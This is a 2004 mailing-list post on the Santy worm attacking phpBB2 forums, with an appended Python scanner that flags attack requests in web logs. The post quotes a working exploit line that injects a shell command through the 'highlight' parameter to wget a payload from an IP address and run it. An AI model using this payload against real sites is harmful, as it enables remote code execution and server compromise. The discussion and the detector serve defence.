Full Disclosure mailing list archives

RE: RE: Worm hitting PHPbb2 Forums


From: Paul Laudanski <zx () castlecops com>
Date: Thu, 23 Dec 2004 23:40:46 -0500 (EST)

On Thu, 23 Dec 2004, Patrick Nolan wrote:

A bot is not uploaded, not sure where that came from.
And by now, it is not expected to be spreading at all, thanks to the
interruption in search requests by Google.

There are a couple posts going on about this, for instance take this 
article:

http://www.cbronline.com/article_news.asp?guid=366C3494-1446-4A8B-973C-F67044266D35

[quote]
"Santy gets easily corrupted," F-Secure Corp's Mikko Hypponen said. "The 
exploit it uses is only able to transfer around 20 bytes of data at a 
time. So the worm transfers itself from one web site to another in small 
chunks."

"If a chunk gets missing, the worm might still work fine... or it might 
fail," Hypponen told ComputerWire. "More generations there are, more 
likely it is to fail because of this."
[/quote]

Compare that to an exploit that is posted @bugtraq:

http://www.securityfocus.com/archive/1/385208

(decoded)

[quote]
rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe 
y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/
.b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'
[/quote]

It is making use of the highlight exploit in pre-phpBB 2.0.11.

Even though the 'worm' itself may be hindered, we can certainly expect 
script kiddies to attempt these manually.

http://www.modsecurity.org/blog/archives/000046.html

Now that is catching the single quote in the highlight argument.

-- 
Regards,

Paul Laudanski - Computer Cops, LLC. CEO & Founder
CastleCops(SM) - http://castlecops.com
Promoting education and health in online security and privacy.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
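A log-side check for the highlight parameter discussed above, added here as an example (not code from the post, phpBB or ModSecurity), with constructed access-log lines: it decodes the highlight value of viewtopic.php requests and flags a quote or a function-call shape, which is the condition the ModSecurity rule is catching.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined-log style (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Dec/2004:10:00:01 -0500] "GET /forum/viewtopic.php?t=12&highlight=password HTTP/1.1" 200 5120',
    '10.0.0.6 - - [23/Dec/2004:10:00:02 -0500] "GET /forum/viewtopic.php?t=12&highlight=%2527.passthru%28%24HTTP_GET_VARS%5Brush%5D%29.%2527&rush=echo HTTP/1.1" 200 812',
    '10.0.0.7 - - [23/Dec/2004:10:00:03 -0500] "GET /forum/index.php HTTP/1.1" 200 3000',
]

# client, timestamp, method, request target, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*" (\d{3})')
# A legitimate highlight value is a search term; a single quote or a
# "name(" call shape inside it is what the ModSecurity rule is after.
SUSPICIOUS_RE = re.compile(r"'|\w+\s*\(")


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encoding cannot hide a quote."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return (client, decoded highlight value) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _ts, _method, target, _status = m.groups()
    parts = urlsplit(target)
    if not parts.path.endswith('/viewtopic.php'):
        return None
    # parse_qs strips one encoding layer; fully_decode removes any that remain.
    for raw in parse_qs(parts.query, keep_blank_values=True).get('highlight', []):
        decoded = fully_decode(raw)
        if SUSPICIOUS_RE.search(decoded):
            return client, decoded
    return None


def scan(lines):
    """Run inspect_line over a log and keep only the hits."""
    return [hit for hit in (inspect_line(l) for l in lines) if hit]
```

Feeding a real access log through scan() gives the client and the decoded highlight value for every request the rule would have blocked.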
